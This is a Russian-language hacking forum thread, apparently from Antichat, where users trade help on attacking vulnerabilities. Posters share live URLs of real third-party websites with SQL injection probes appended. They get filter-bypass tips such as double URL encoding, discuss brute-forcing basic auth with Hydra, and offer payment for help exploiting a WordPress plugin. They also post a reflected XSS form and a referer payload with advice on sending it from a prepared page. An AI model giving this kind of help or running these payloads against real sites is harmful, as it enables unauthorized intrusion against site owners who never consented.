Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'
    чёт туплю, не могу вывод сделать(
     
  2. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Абсолютно верно. Логин и пароль указаны в кодировке base64. По поводу перехватить - если ты не в одной сети с жервтой будет сложно. Зато брутится очень легко.
     
    _________________________
    Lesanglier likes this.
  3. Lesanglier

    Lesanglier Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    3
    burp справится хорошо или лучше другим софтом?
     
  4. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Я гидрой бручу basic. Но у меня то сервер. А так на вкус и цвет.
     
    _________________________
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я не виду там инъекции. Может я тоже туплю. Кидай ещё сайты
     
  6. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf
    фильтр на _
    Как обойти?
    принципиально важно обойти именно в нем ограничение
     
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    %255F
     
  8. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    хотелось бы на конкретном примере. у меня не получается
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F
     
  10. preno

    preno Member

    Joined:
    5 Sep 2010
    Messages:
    249
    Likes Received:
    6
    Reputations:
    0
    Получаем %5F
    SQL не крутится
     
  11. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    DezMond™, учи матчасть про двойной urlencode, потом советуй.
     
  12. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    на сайте с wordpress есть плашин старый с вулном - https://www.exploit-db.com/exploits/36414/
    Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю.

    За помощь в реализации, готов отблагоодарить хорошо
     
    #2052 foozzione, 15 Sep 2017
    Last edited: 15 Sep 2017
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS
     
    _________________________
  14. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Парсите тело ответа
     
    _________________________
  16. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    то есть в случае с Reflected XSS via HTTP referer, я должен отправить похожую форму:
    HTML:
    <form method=POST action="https://YOUR.BLOG/">
    <input type=hidden name="action" value="sample-permalink">
    <input type=submit>
    </form>

    с реферером: ?lang=en"><script>alert("hello");</'+'script>
    Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...
     
  17. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Mozilla выдает
    Code:
    <a href="/message.php?mesid=0101&r0zt7%22%3E%3Cscript%3Ealert(1)%3C/script%3Eabys9=1&sb=88">Apple</a>
    Burp выдает
    Code:
    <a href="/message.php?mesid=0101&r0zt7"><script>alert(1)</script>abys9=1&sb=88">Apple</a>
    Я так понимаю мешает URL ENCODE как эксплуатируется?
     
  18. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Internet Explorer

    Если рефер не чекается, то отправить можно со своего хоста.
     
    #2058 crlf, 19 Sep 2017
    Last edited: 19 Sep 2017
  19. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    Искусственно поставить рефер?
     
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    С подготовленной страницы перенаправить.